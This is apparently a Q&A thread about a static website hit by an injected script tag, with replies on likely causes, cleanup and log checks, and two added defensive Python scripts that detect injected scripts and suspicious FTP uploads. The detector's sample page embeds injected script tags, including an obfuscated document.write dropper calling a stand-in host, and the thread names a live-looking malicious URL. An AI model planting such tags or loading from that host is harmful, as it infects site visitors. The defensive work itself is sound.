views:

119

answers:

2

Hello,

My friend has a web site on ovh.com. For a couple of days now, the site has been flagged as dangerous by Google.

I had a look at the files (the site only contains HTML, CSS and JPG) and it appears that a new line of code:

<script>http://...page.php</script></body>

(I do not remember the exact URL) has been added to some of the HTML pages. This is obviously a virus that would be run when the page is displayed.

If I delete this line and scan the file again, it is fine.

How could this be added to a file on the server? Is there something to do to prevent such things? (I am thinking about .htaccess stuff or similar.) I do not see how the FTP credentials could have been stolen, so for me this code insertion must come from somewhere else.

Could you please help ?

Thanks a lot,

Luc

+1  A: 
  1. Are you using shared hosting? Your provider did not take enough measures to ensure that customers do not have access to each other's accounts.
  2. Is your password easy to guess?
  3. Any change to .htaccess will not help.
Ankit Jain
Hello, yes, shared hosting. The password is not easy to guess at all. A new folder has even been added in the directory structure.
Luc
+5  A: 

This likely isn't a hack in the sense you're thinking of. Shared hosting isn't usually the problem, and it's unlikely that someone guessed your password. Not knowing details, I'd bet that somewhere on the account you have a piece of open source software such as Joomla, phpBB, WordPress, or similar. I'd also bet that this piece of software has not been updated in a while.

This is fairly common. Hackers find vulnerable scripts and crawl the web "sniffing" for particular versions of code that they can use to gain access to your site. Several jobs ago, a Russian porn operation got into my company's website via a rogue install of phpBB that an employee had snuck onto the server. Via this vulnerable code, they injected thousands of files and even gained access to the database by creating a new "superadmin" with all privileges. Needless to say, it was a mess to clean up. A similar issue happened to an account that I used for testing purposes: an old version of Joomla allowed the user to inject gibberish-looking JavaScript that attempted to install a virus via the user's browser, and also caused the error screen you're describing in Chrome. My current company's production site sees hundreds of attempts to exploit phpMyAdmin each day in the logs, which is why we've stopped using it.

So, now what? First, take your site down for a bit to protect others, and take the opportunity to change the DB and FTP passwords. Second, analyze what's out there: blast any unused code and update open-source scripts. Make sure software passwords aren't left in the default state, because the hackers know them (ever wonder how most WiFi is hacked?). Then, the not-so-fun part: dig through pages to clean up injected code. Find-and-replace or grep can help speed this part, but be careful to get it all out or they might have a way to get back in. In the case of my personal site, it took two go-arounds to completely get the site locked down and cleaned up. The good news here is that most of these attacks are automated, so the injected code is pretty obvious and almost always in the same location, using similar syntax from page to page. Also, be aware that some of these attacks host files on your server, so scrutinize files to make sure they're legit.

Finally, analyze your own code to see if you've left any holes. Login scripts, fwrites, and even queries can be targets for injection. Be careful what you open yourself up to.

bpeterson76
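The cleanup step in the answer above (grep every page for the injected tag, get it all out, and record when each tampered file was last written so it can be compared with the logs) as an added Python example; this is not code from the answer, the original page, or the hacked site. It scans static HTML for script tags that load from a host outside an allowlist or that carry the obfuscation fingerprints automated injectors leave, reports the file's modification time, and can strip the flagged tags. The host names, the allowlist and the sample page are constructed for the example.

```python
"""Find (and optionally strip) <script> tags injected into static HTML pages.

Added example: the host names, ALLOWED_HOSTS and SAMPLE_PAGE are constructed
for illustration, not taken from the hacked site."""
import re
import sys
from datetime import datetime
from pathlib import Path
from urllib.parse import urlparse

# Hosts the site owner deliberately loads scripts from; anything else is foreign.
ALLOWED_HOSTS = {"static.example.com"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Fingerprints of the obfuscated droppers automated injectors usually leave:
# unescape()/eval()/fromCharCode() calls and \xNN-escaped strings.
OBFUSCATION_RE = re.compile(r"(?:unescape|eval|fromCharCode)\s*\(|\\x[0-9a-f]{2}", re.IGNORECASE)

# Constructed sample: a clean page with one legitimate external script and one
# relative one, plus two injected tags before </body> in the shape the question describes.
SAMPLE_PAGE = """<html><head>
<script src="https://static.example.com/site.js"></script>
<script src="/js/menu.js"></script>
</head><body>
<p>Welcome to the club site.</p>
<script src="http://injected.example.net/res/page.php"></script>
<script>document.write(unescape('%3Cscript src=%22http://injected.example.net/res/page.php%22%3E%3C/script%3E'))</script></body></html>
"""


def script_hosts(tag):
    """Host names a <script> tag pulls code from: its src attribute plus any absolute
    URL in its body (droppers often build the URL inside inline JavaScript)."""
    candidates = [m.group(1) for m in SRC_RE.finditer(tag)] + URL_RE.findall(tag)
    hosts = set()
    for url in candidates:
        host = urlparse(url).hostname  # None for relative paths such as /js/menu.js
        if host:
            hosts.add(host.lower())
    return hosts


def find_injected_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """One finding per <script> tag that loads from a host outside the allowlist or
    that matches an obfuscation fingerprint, in page order."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for m in SCRIPT_RE.finditer(html):
        tag = m.group(0)
        foreign = sorted(script_hosts(tag) - allowed)
        reasons = []
        if foreign:
            reasons.append("loads from " + ", ".join(foreign))
        if OBFUSCATION_RE.search(tag):
            reasons.append("obfuscated inline script")
        if reasons:
            findings.append({"offset": m.start(), "tag": tag, "hosts": foreign, "reasons": reasons})
    return findings


def strip_injected_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Cut every flagged tag out of the page; returns (cleaned_html, removed_count).
    Removal runs back to front so earlier offsets stay valid."""
    findings = find_injected_scripts(html, allowed_hosts)
    cleaned = html
    for f in reversed(findings):
        cleaned = cleaned[:f["offset"]] + cleaned[f["offset"] + len(f["tag"]):]
    return cleaned, len(findings)


def scan_tree(root, allowed_hosts=ALLOWED_HOSTS):
    """Walk a site tree; return (path, mtime, reasons) for every page with a flagged
    tag. The mtime is the value to line up against the FTP and HTTP logs."""
    hits = []
    for path in sorted(Path(root).rglob("*.htm*")):
        findings = find_injected_scripts(path.read_text(errors="replace"), allowed_hosts)
        if findings:
            mtime = datetime.fromtimestamp(path.stat().st_mtime)
            hits.append((str(path), mtime, [r for f in findings for r in f["reasons"]]))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:  # python scan.py /path/to/site
        for path, mtime, reasons in scan_tree(sys.argv[1]):
            print(f"{mtime:%Y-%m-%d %H:%M:%S}  {path}: {'; '.join(reasons)}")
    else:
        for f in find_injected_scripts(SAMPLE_PAGE):
            print(f"offset {f['offset']}: {'; '.join(f['reasons'])}")
        cleaned, removed = strip_injected_scripts(SAMPLE_PAGE)
        print(f"removed {removed} tag(s); page still ends with </body>: {'</body>' in cleaned}")
```

Run it against a copy of the site tree, not the live one, and keep the untouched copy: the flagged tags and their offsets are the evidence, and the modification times scan_tree reports are what you compare with the transfer and access logs before you overwrite anything.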
Hello, thanks for your long response. In fact, there are no open source pieces in the picture. My friend only created a couple of HTML pages and CSS, and added a couple of JPG files. I was wondering if something like Joomla could make the thing more secure, but I think that would be too much for my friend's needs. I have checked the code of the HTML pages and saw the line that was added by (probably) a robot. I can clean this up quite easily but I guess it will be the same thing tomorrow morning :( I'll check for forms or things like that but I'm pretty sure there are none. Thanks a lot.
Luc
Is there a chance you could post the URL? We could probably help you figure it out a little easier. I understand if you'd like to keep it private though...
bpeterson76
Actually, the other thing is, if you don't have any obvious glaring holes in your code, you might contact the host to monitor the activity on the site. You could also do this yourself with analytics if it's installed. At the least, it'll tell you what pages people are accessing so that you can analyze for holes. Who knows, maybe they're back-dooring the site through something you don't even control.
bpeterson76
Yes, the site is piccadillysbulls.com. Is it possible that some Apache vulnerabilities were exploited and that all the sites on this shared host were hacked too? Can it be something else? Thanks a lot for your help.
Luc
Luc, there's nothing there that's obvious besides the link to gawalisamaj.org/res/page.php. You could take a look at the modification date of the file, compare it to the Apache access log, and at least have an idea where it's coming from. Perhaps the order in which that particular user modified files could tell the story. Also, logs might tell you what method they are using to get in, whether it's via FTP or HTTP. Some analytics programs can show paths through sites; see if your host offers anything like that. Bottom line, time to get the host involved... this isn't a great thing.
bpeterson76
Hi, thanks for your help, I will check with the host then :(. I really appreciate your help. I'll keep you informed :)
Luc
Hello, so just to close the question: you were right in that the FTP password was in fact stolen, I would say sniffed on the network. I had a look at the FTP log and saw some uploads in the middle of the night, when this should not happen. Those uploads were in a folder created at the same time. As FTP does not encrypt the password, that is obviously a problem. Thanks a lot for your valuable comments. Best Regards, Luc
Luc
You're right, it was either that your FTP password was sniffed over the network or that it was taken from one of your PCs that held it (stored in a code editor with a built-in FTP client, or in the FTP program itself).
DMin
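The log check that closed the thread (compare a tampered file's modification time with the transfer log, and look for uploads at odd hours into a folder that appeared at the same time), written out as an added Python example rather than anything posted in the thread. It parses the xferlog format that wu-ftpd and ProFTPD write to their TransferLog; the sample lines, the addresses, the paths and the "trusted address" list are constructed for the example, and the quiet-hours window is an assumption about when the owner works.

```python
"""Pick suspicious uploads out of an FTP transfer log and line them up with a
tampered file's modification time.

Added example. The log is the xferlog format written by wu-ftpd and ProFTPD's
TransferLog; SAMPLE_XFERLOG, the addresses, the paths and TRUSTED_HOSTS are
constructed for illustration."""
from datetime import datetime, timedelta

# Constructed sample. After the five-token date the fields are: transfer-seconds,
# remote-host, bytes, path, type (a/b), special-action, direction (i=upload,
# o=download, d=delete), access-mode, user, service, auth-method, auth-uid, completion.
SAMPLE_XFERLOG = """\
Mon Jun 14 10:02:11 2010 2 198.51.100.7 1820 /www/index.html a _ i r luc ftp 0 * c
Mon Jun 14 10:05:40 2010 1 198.51.100.7 940 /www/style.css a _ i r luc ftp 0 * c
Tue Jun 15 03:12:45 2010 1 203.0.113.5 3109 /www/res/page.php a _ i r luc ftp 0 * c
Tue Jun 15 03:13:02 2010 1 203.0.113.5 1977 /www/index.html a _ i r luc ftp 0 * c
Tue Jun 15 09:30:15 2010 1 198.51.100.7 1977 /www/index.html a _ o r luc ftp 0 * c
"""

# Addresses the owner actually works from (constructed); everything else is suspect.
TRUSTED_HOSTS = {"198.51.100.7"}


def parse_xferlog(text):
    """Turn xferlog lines into dicts; malformed or truncated lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 18:
            continue
        when = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
        entries.append({
            "time": when, "host": parts[6], "bytes": int(parts[7]), "path": parts[8],
            "direction": parts[11], "user": parts[13], "status": parts[17],
        })
    return entries


def flag_uploads(entries, trusted_hosts=TRUSTED_HOSTS, quiet_hours=range(0, 6)):
    """Uploads from an address outside trusted_hosts, or made during hours the owner
    never works (assumed 00:00-05:59). Each entry carries the reasons it was flagged."""
    flagged = []
    for e in entries:
        if e["direction"] != "i":
            continue
        reasons = []
        if e["host"] not in trusted_hosts:
            reasons.append("unknown address " + e["host"])
        if e["time"].hour in quiet_hours:
            reasons.append("upload at " + e["time"].strftime("%H:%M"))
        if reasons:
            flagged.append(dict(e, reasons=reasons))
    return flagged


def new_directories(entries, trusted_hosts=TRUSTED_HOSTS):
    """Directories that only ever received uploads from untrusted addresses: the
    'new folder' an intruder created for their own files."""
    hosts_by_dir = {}
    for e in entries:
        if e["direction"] == "i":
            directory = e["path"].rsplit("/", 1)[0] or "/"
            hosts_by_dir.setdefault(directory, set()).add(e["host"])
    return sorted(d for d, hosts in hosts_by_dir.items() if not hosts & set(trusted_hosts))


def uploads_near(entries, mtime, window=timedelta(minutes=5)):
    """Uploads within `window` of a tampered file's mtime, oldest first: these are
    the log lines that explain how the file got its current contents."""
    near = [e for e in entries if e["direction"] == "i" and abs(e["time"] - mtime) <= window]
    return sorted(near, key=lambda e: e["time"])


if __name__ == "__main__":
    entries = parse_xferlog(SAMPLE_XFERLOG)
    for e in flag_uploads(entries):
        print(f"{e['time']:%Y-%m-%d %H:%M:%S} {e['host']:>15} {e['path']}  <- {'; '.join(e['reasons'])}")
    print("directories touched only by untrusted addresses:", new_directories(entries))
    # mtime of the defaced index.html as stat() would report it (constructed).
    for e in uploads_near(entries, datetime(2010, 6, 15, 3, 13, 30)):
        print("explains the mtime:", e["path"], "from", e["host"])
```

Two caveats when running this on a real log: the server may write timestamps in its own zone rather than the one your file mtimes are shown in, so convert both to the same zone before comparing, and an intruder who already has the password can log in from the owner's own address range, which is why the quiet-hours check is kept alongside the address check rather than replaced by it.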